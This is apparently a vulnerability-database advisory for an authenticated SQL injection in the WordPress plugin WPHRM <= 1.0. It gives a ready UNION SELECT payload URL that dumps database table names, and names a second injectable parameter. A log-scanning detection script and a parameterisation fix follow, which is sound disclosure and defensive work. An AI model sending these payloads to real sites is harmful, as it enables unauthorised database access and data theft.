WPHRM <= 1.0 - Authenticated SQL Injection

2017-10-11T00:00:00
ID WPEX-ID:8929
Type wpexploit
Reporter David Hayes
Modified 2019-11-01T00:00:00

Description

WordPress Vulnerability - WPHRM <= 1.0 - Authenticated SQL Injection

                                        
http://localhost/[PATH]/?hr-dashboard=user&page=message&tab=view_message&from=inbox&id=[SQL]-23+union+select 1,2,3,4,5,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()),7,8--%20-

http://localhost/[PATH]/?hr-dashboard=user&page=user&tab=view_employee&action=view&employee_id=[SQL]
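
Detection check for the two parameters above, as an added example that is not part of the original advisory or the plugin's code: it scans access-log lines for WPHRM requests whose id or employee_id value is not a plain integer. It assumes combined-format logs and that legitimate values of both parameters are decimal record ids; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters marked [SQL] in the two request URLs of this advisory.
WATCHED = ("id", "employee_id")
# Assumption: legitimate values are plain decimal record ids.
NUMERIC = re.compile(r"[0-9]+")
# Request field of a combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')


def suspicious_params(target):
    """Return (name, decoded value) for watched parameters that are not numeric."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if "hr-dashboard" not in query:  # not a WPHRM front-end request
        return []
    return [(name, value)
            for name in WATCHED
            for value in query.get(name, [])
            if not NUMERIC.fullmatch(value)]


def scan(lines):
    """Return [(line_number, findings)] for log lines with a non-numeric watched value."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        found = suspicious_params(match.group(1)) if match else []
        if found:
            hits.append((number, found))
    return hits


# Constructed sample log lines (documentation addresses, made-up sizes).
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Oct/2017:10:00:01 +0000] "GET /?hr-dashboard=user&page=message&tab=view_message&from=inbox&id=23 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [11/Oct/2017:10:00:07 +0000] "GET /?hr-dashboard=user&page=message&tab=view_message&from=inbox&id=-23+union+select+1,2,3 HTTP/1.1" 200 8841',
    '203.0.113.5 - - [11/Oct/2017:10:01:12 +0000] "GET /?hr-dashboard=user&page=user&tab=view_employee&action=view&employee_id=12 HTTP/1.1" 200 4310',
    '203.0.113.9 - - [11/Oct/2017:10:01:30 +0000] "GET /?hr-dashboard=user&page=user&tab=view_employee&action=view&employee_id=12%27 HTTP/1.1" 500 310',
    '203.0.113.7 - - [11/Oct/2017:10:02:00 +0000] "GET /shop/?id=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, found in scan(SAMPLE_LOG):
        print(number, found)
```

The same integer-only rule is the general server-side fix for this class of bug: cast both values to integers or bind them with $wpdb->prepare() before they reach a query.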